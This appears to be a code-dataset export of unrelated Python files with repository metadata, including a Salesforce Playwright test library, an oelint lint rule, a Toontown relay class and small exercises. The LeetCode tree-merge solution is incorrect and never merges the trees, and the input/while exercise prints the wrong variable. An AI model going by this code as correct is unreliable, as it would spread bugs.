# the item in course_info[0][1] is a digit or alph
for (courses, course_info) in exam_schedule.items():
if course_info[0][1][0].isdigit():
print('Course %s has exam on %s at %s'
% (courses, course_info[0][2], course_info[0][3]))
else:
print('Course %s section %s has exam on %s at %s'
% (courses, course_info[0][1], course_info[0][2],
course_info[0][3]))
| UTF-8 | Python | false | false | 11,007 | py | 3 | queries.py | 3 | 0.631053 | 0.591805 | 0 | 285 | 37.621053 | 78 |
iffanux/vstutils | 7,078,106,113,876 | b0b6b66f4a4931d65bd0c64cf4b4a600bbb43695 | 51a62a14ef31f7001f0eade4e30813eb0b0a7147 | /vstutils/__init__.py | fc023e801b2b1a5a97432914de90bd16538a8d3f | [
"Apache-2.0"
] | permissive | https://github.com/iffanux/vstutils | 62b3c122a884c6deef8e2f42a90c298706de8faa | 4ff1a21a8fe0641895af758680a116d2bd8056aa | refs/heads/master | 2020-05-16T18:22:08.978787 | 2019-04-24T08:15:30 | 2019-04-24T08:15:30 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # pylint: disable=django-not-available
__version__ = '1.9.5'
| UTF-8 | Python | false | false | 61 | py | 2 | __init__.py | 1 | 0.672131 | 0.622951 | 0 | 2 | 29.5 | 38 |
n0miya/ProblemSet | 2,448,131,360,651 | 06efdbdfa183104d07f0750287ab52ba280772a5 | c942f480783cad493b4804d666337265a308fddd | /Coding_Competency/LeetCode/617_Merge_Two_Binary_Trees.py | dee58eda4222e0018de50d85d7615c099378f920 | [] | no_license | https://github.com/n0miya/ProblemSet | bb1346cd9d2cf98b0cd16227385e30656b90d4f5 | dd82722398f082ee7a4fbf2d14fdaa456a9c32d5 | refs/heads/main | 2023-05-07T10:46:21.410285 | 2023-05-04T17:34:02 | 2023-05-04T17:34:02 | 370,749,594 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import Optional
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def mergeTrees(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> Optional[TreeNode]:
root = TreeNode()
while root1.left or root1.right or root2.left or root2.right:
root.val = root1.val + root2.val
root1.val = root1.left
root2.val = root2.left
return root
tree1 = TreeNode(1, TreeNode(3, TreeNode(5, None, None), None), TreeNode(2, None, None))
tree2 = TreeNode(2, TreeNode(1, None, TreeNode(4, None, None)), TreeNode(3, None, TreeNode(7, None, None)))
print(Solution().mergeTrees(tree1, tree2))
| UTF-8 | Python | false | false | 818 | py | 999 | 617_Merge_Two_Binary_Trees.py | 573 | 0.632029 | 0.600244 | 0 | 25 | 31.72 | 107 |
zcwist/dx2x2 | 283,467,866,103 | 83e5d78323e5674dbd0be2603cce9df0f34fdb2c | 2f849e5abab4688bb39cd2f31607605506c33234 | /database/DBTester.py | f878cfbd1fb7985fe6c37c78c7733a5509a515f5 | [] | no_license | https://github.com/zcwist/dx2x2 | e3935b47308197650dd0964cc970274f936dc80a | 1b65ef30cfcba320336dbf34708dc3768fb100c3 | refs/heads/master | 2022-12-10T23:07:06.321355 | 2018-07-02T04:17:19 | 2018-07-02T04:17:19 | 94,134,604 | 0 | 1 | null | false | 2021-06-01T22:18:49 | 2017-06-12T19:51:08 | 2018-07-02T04:17:55 | 2021-06-01T22:18:49 | 6,510 | 0 | 1 | 5 | JavaScript | false | false | from DBAccess import *
from addData import *
if __name__ == "__main__":
for x in range(10):
print get_user_name("001")
print get_user_name("002") | UTF-8 | Python | false | false | 166 | py | 31 | DBTester.py | 13 | 0.578313 | 0.53012 | 0 | 7 | 22.857143 | 34 |
SFDO-Tooling/CumulusCI | 9,663,676,454,828 | ef34eb7a0af94bfe747f570cbc648bbf59481670 | 6564f42640e11689c2ddb6b92325afe6fddc6a6f | /cumulusci/robotframework/SalesforcePlaywright.py | 9eba2edf11d0a0f6159b009b5fffedb74faa98f1 | [
"LicenseRef-scancode-free-unknown"
] | permissive | https://github.com/SFDO-Tooling/CumulusCI | 32d4509fa8a36905cfc84fd6283403fd7f4b78c4 | 9ccf3c9566f78c6e9102ac214db30470cef660c1 | refs/heads/main | 2023-08-18T04:53:55.733027 | 2023-08-11T20:52:08 | 2023-08-11T20:52:08 | 15,592,459 | 226 | 134 | BSD-3-Clause | false | 2023-09-14T05:09:26 | 2014-01-02T20:01:31 | 2023-08-31T22:41:13 | 2023-09-13T23:57:42 | 100,017 | 336 | 228 | 175 | Python | false | false | import re
import time
from Browser import SupportedBrowsers
from Browser.utils.data_types import KeyAction, PageLoadStates
from robot.utils import timestr_to_secs
from cumulusci.robotframework.base_library import BaseLibrary
from cumulusci.robotframework.faker_mixin import FakerMixin
from cumulusci.robotframework.utils import (
WAIT_FOR_AURA_SCRIPT,
capture_screenshot_on_error,
)
class SalesforcePlaywright(FakerMixin, BaseLibrary):
ROBOT_LIBRARY_SCOPE = "Suite"
def __init__(self):
super().__init__()
self._browser = None
@property
def browser(self):
if self._browser is None:
self._browser = self.builtin.get_library_instance("Browser")
return self._browser
def get_current_record_id(self):
"""Parses the current url to get the object id of the current record.
This expects the url to contain an id that matches [a-zA-Z0-9]{15,18}
"""
OID_REGEX = r"^(%2F)?([a-zA-Z0-9]{15,18})$"
url = self.browser.evaluate_javascript(None, "window.location.href")
for part in url.split("/"):
oid_match = re.match(OID_REGEX, part)
if oid_match is not None:
return oid_match[2]
raise AssertionError(f"Could not parse record id from url: {url}")
def go_to_record_home(self, obj_id):
"""Navigates to the Home view of a Salesforce Object
After navigating, this will wait until the slds-page-header_record-home
div can be found on the page.
"""
url = self.cumulusci.org.lightning_base_url
url = f"{url}/lightning/r/{obj_id}/view"
self.browser.go_to(url)
self.wait_until_loading_is_complete("div.slds-page-header_record-home")
def delete_records_and_close_browser(self):
"""This will close all open browser windows and then delete
all records that were created with the Salesforce API during
this testing session.
"""
self.browser.close_browser("ALL")
self.salesforce_api.delete_session_records()
def open_test_browser(
self, size=None, useralias=None, wait=True, record_video=None
):
"""Open a new Playwright browser, context, and page to the default org.
The return value is a tuple of the browser id, context id, and page details
returned by the Playwright keywords New Browser, New Context, and New Page.
This provides the most common environment for testing. For more control,
you can create your own browser environment with the Browser library
keywords `Create Browser`, `Create Context`, and `Create Page`.
To record a video of the session, set `record_video` to True. The video
(*.webm) will be viewable in the log.html file at the point where this
keyword is logged.
This keyword automatically calls the browser keyword `Wait until network is idle`.
"""
wait = self.builtin.convert_to_boolean(wait)
default_size = self.builtin.get_variable_value(
"${DEFAULT BROWSER SIZE}", "1280x1024"
)
size = size or default_size
browser = self.builtin.get_variable_value("${BROWSER}", "chrome")
headless = browser.startswith("headless")
browser_type = browser[8:] if headless else browser
browser_type = "chromium" if browser_type == "chrome" else browser_type
browser_enum = getattr(SupportedBrowsers, browser_type, None)
# Note: we can't just pass alias=useralias in the case of useralias being None.
# That value gets passed to a salesforce query which barfs if the value
# is None.
login_url = (
self.cumulusci.login_url(alias=useralias)
if useralias
else self.cumulusci.login_url()
)
if record_video:
# ugh. the "dir" value must be non-empty, and will be treated as
# a folder name under the browser/video folder. using "../video"
# seems to be the only way to get the videos to go directly in
# the video folder. Also, using "." doesn't work :-/
record_video = {"dir": "../video"}
width, height = size.split("x", 1)
browser_id = self.browser.new_browser(browser=browser_enum, headless=headless)
context_id = self.browser.new_context(
viewport={"width": width, "height": height}, recordVideo=record_video
)
self.browser.set_browser_timeout("15 seconds")
page_details = self.browser.new_page(login_url)
if wait:
self.wait_until_salesforce_is_ready(login_url)
return browser_id, context_id, page_details
@capture_screenshot_on_error
def wait_until_loading_is_complete(self, locator=None, timeout="15 seconds"):
"""Wait for a lightning page to load.
By default this keyword will wait for any element with the
class 'slds-template__container', but a different locator can
be provided.
In addition to waiting for the element, it will also wait for
any pending aura events to finish.
"""
locator = (
"//div[contains(@class, 'slds-template__container')]/*"
if locator is None
else locator
)
self.browser.get_elements(locator)
self.browser.evaluate_javascript(None, WAIT_FOR_AURA_SCRIPT)
# An old knowledge article recommends waiting a second. I don't
# like it, but it seems to help. We should do a wait instead,
# but I can't figure out what to wait on.
time.sleep(1)
@capture_screenshot_on_error
def wait_until_salesforce_is_ready(
self, login_url, locator=None, timeout="30 seconds"
):
"""Attempt to wait until we land on a lightning page
In addition to waiting for a lightning page, this keyword will
also attempt to wait until there are no more pending ajax
requests.
The timeout parameter is taken as a rough guideline. This
keyword will actually wait for half of the timeout before
starting checks for edge cases.
"""
timeout_seconds = timestr_to_secs(timeout)
start_time = time.time()
locator = locator or "div.slds-template__container"
expected_url = rf"/{self.cumulusci.org.lightning_base_url}\/lightning\/.*/"
while True:
try:
# only wait for half of the timeout before doing some additional
# checks. This seems to work better than one long timeout.
self.browser.wait_for_navigation(
expected_url, timeout_seconds // 2, PageLoadStates.networkidle
)
self.wait_until_loading_is_complete(locator)
# No errors? We're golden.
break
except Exception as exc:
# dang. Maybe we landed somewhere unexpected?
if self._check_for_classic():
continue
if time.time() - start_time > timeout_seconds:
self.browser.take_screenshot()
raise Exception("Timed out waiting for a lightning page") from exc
# If at first you don't succeed, ...
self.browser.go_to(login_url)
def _check_for_classic(self):
"""Switch to lightning if we land on a classic page
This seems to happen randomly, causing tests to fail
catastrophically. The idea is to detect such a case and
auto-click the "switch to lightning" link
"""
try:
self.browser.get_element("a.switch-to-lightning")
self.builtin.log(
"It appears we are on a classic page; attempting to switch to lightning",
"WARN",
)
# just in case there's a modal present we'll try simulating
# the escape key. Then, click on the switch-to-lightning link
self.browser.keyboard_key(KeyAction.press, "Escape")
self.builtin.sleep("1 second")
self.browser.click("a.switch-to-lightning")
return True
except (AssertionError):
return False
def breakpoint(self):
"""Serves as a breakpoint for the robot debugger
Note: this keyword is a no-op unless the ``robot_debug`` option for
the task has been set to ``true``. Unless the option has been
set, this keyword will have no effect on a running test.
"""
return None
| UTF-8 | Python | false | false | 8,596 | py | 715 | SalesforcePlaywright.py | 511 | 0.621219 | 0.61738 | 0 | 220 | 38.072727 | 90 |
renankemiya/exercicios | 6,640,019,441,822 | 4d5b79d7c7fc339f6caed8cacbac9a902fdacaa3 | cb5d1d9098f65c3ad0eaf966d297e8e9158bfb77 | /matematica/calculo/soma.py | 391e83a205ebeec025b9d43a55a936d3cbefcb56 | [
"MIT"
] | permissive | https://github.com/renankemiya/exercicios | a6b6790589e6f5628683a288a3daf25d06fd810d | 669f38acc2e85f84003bfaaccbfbaeb9211dd599 | refs/heads/master | 2022-12-15T03:43:56.902440 | 2020-09-14T20:09:31 | 2020-09-14T20:09:31 | 278,484,771 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def soma(parcela, parcela_2):
'''Essa função soma duas parcelas
:param parcela:
:param parcela_2:
:return:
'''
return parcela + parcela_2
if __name__ == '__main__':
print(soma(1, 2)) | UTF-8 | Python | false | false | 213 | py | 52 | soma.py | 50 | 0.57346 | 0.549763 | 0 | 10 | 20.2 | 37 |
priv-kweihmann/oelint-adv | 19,507,741,482,771 | a28e0668249758c66f445b5b84489e91181481d7 | 708ac9f1e466258b71c057cf64a4f5580467d2d4 | /oelint_adv/rule_base/rule_var_src_uri_srcrevtag.py | 0af862f898ac7c1936b9107a1f7e2356a3e919e5 | [
"BSD-2-Clause"
] | permissive | https://github.com/priv-kweihmann/oelint-adv | 93237344ed7c54030a95214b18180b703008ba2d | 6aab44abbe689fde96b32112f41a176a7959606d | refs/heads/master | 2023-08-24T19:51:35.550808 | 2023-08-23T15:31:56 | 2023-08-23T15:31:56 | 173,965,564 | 39 | 24 | BSD-2-Clause | false | 2023-09-11T14:04:29 | 2019-03-05T14:50:13 | 2023-08-26T17:11:59 | 2023-09-11T14:04:28 | 752 | 43 | 19 | 10 | Python | false | false | from oelint_adv.cls_rule import Rule
from oelint_parser.cls_item import Variable
from oelint_parser.helper_files import get_scr_components
from oelint_parser.parser import INLINE_BLOCK
class VarSRCUriSRCREVTag(Rule):
def __init__(self):
super().__init__(id='oelint.vars.srcurisrcrevtag',
severity='error',
message='\'tag\' in SRC_URI and a SRCREV for the same component doesn\'t compute')
def check(self, _file, stash):
res = []
items = stash.GetItemsFor(filename=_file, classifier=Variable.CLASSIFIER,
attribute=Variable.ATTR_VAR, attributeValue='SRC_URI')
for item in items:
if any(item.Flag.endswith(x) for x in ['md5sum', 'sha256sum']):
# These are just the hashes
continue
lines = [y.strip('"') for y in item.get_items() if y]
for x in lines:
if x == INLINE_BLOCK:
continue
_url = get_scr_components(x)
if _url['scheme'] in ['git'] and 'tag' in _url['options']:
_srcrevs = stash.GetItemsFor(filename=_file, classifier=Variable.CLASSIFIER,
attribute=Variable.ATTR_VAR, attributeValue='SRCREV')
if 'name' in _url['options']:
_srcrevs = [
x for x in _srcrevs if _url['options']['name'] in x.SubItems]
else:
_srcrevs = [x for x in _srcrevs if not x.SubItems]
if any(_srcrevs):
res += self.finding(item.Origin, item.InFileLine)
return res
| UTF-8 | Python | false | false | 1,739 | py | 184 | rule_var_src_uri_srcrevtag.py | 171 | 0.521564 | 0.519264 | 0 | 36 | 47.305556 | 107 |
Vincent105/python | 19,043,885,006,010 | b5f11ac38ecac4ebbbcef346e3bc882d8bf42447 | a974de6285db76b669937e9619a805c226bb11a6 | /01_Python_Crash_Course/0701_input_while/07T403_while_fill_dictionary.py | 6927fc7b867688c08ed976922bcb01a2827bfed0 | [] | no_license | https://github.com/Vincent105/python | 1b3f753e6b9db711e320b53c3e0a04c9fc818c37 | 65351234310a81a85331b0f11aef42507868774d | refs/heads/master | 2021-08-03T21:06:57.977065 | 2021-07-30T09:02:56 | 2021-07-30T09:02:56 | 185,359,652 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | responses = {}
active = True
while active:
name = input("What's your name?")
place = input("If you could visit one place in the world, where would you go?")
responses[name] = place
repeat = input("Would you like to keyin another respond? (yes/ no)")
if repeat == 'no':
active = False
print("\n--- Results ---")
for name, plcae in responses.items():
print(name.title() + " would like to go to " + place + ".") | UTF-8 | Python | false | false | 425 | py | 542 | 07T403_while_fill_dictionary.py | 471 | 0.642353 | 0.642353 | 0 | 17 | 24.058824 | 80 |
open-toontown/open-toontown | 14,980,845,944,249 | 73969146fe54bf9c64ffe6550cdff185f22e1b21 | da1721d2783ea4d67ff4e73cee6eee71292f2ef7 | /toontown/uberdog/TTSpeedchatRelay.py | 1bb965c253ded0f449d25f0e29e6489e29e900e0 | [
"BSD-3-Clause"
] | permissive | https://github.com/open-toontown/open-toontown | bbdeb1b7bf0fb2861eba2df5483738c0112090ca | 464c2d45f60551c31397bd03561582804e760b4a | refs/heads/develop | 2023-07-07T01:34:31.959657 | 2023-05-30T23:49:10 | 2023-05-30T23:49:10 | 219,221,570 | 143 | 104 | BSD-3-Clause | false | 2023-09-11T09:52:34 | 2019-11-02T22:24:38 | 2023-09-04T15:56:21 | 2023-09-11T09:52:34 | 7,389 | 123 | 63 | 34 | Python | false | false | from direct.distributed.DistributedObjectGlobal import DistributedObjectGlobal
from direct.directnotify.DirectNotifyGlobal import directNotify
from otp.otpbase import OTPGlobals
from otp.uberdog.SpeedchatRelay import SpeedchatRelay
from otp.uberdog import SpeedchatRelayGlobals
class TTSpeedchatRelay(SpeedchatRelay):
def __init__(self, cr):
SpeedchatRelay.__init__(self, cr)
def sendSpeedchatToonTask(self, receiverId, taskId, toNpcId, toonProgress, msgIndex):
self.sendSpeedchatToRelay(receiverId, SpeedchatRelayGlobals.TOONTOWN_QUEST, [taskId,
toNpcId,
toonProgress,
msgIndex])
| UTF-8 | Python | false | false | 635 | py | 1,547 | TTSpeedchatRelay.py | 1,538 | 0.777953 | 0.777953 | 0 | 16 | 38.6875 | 92 |
Subsets and Splits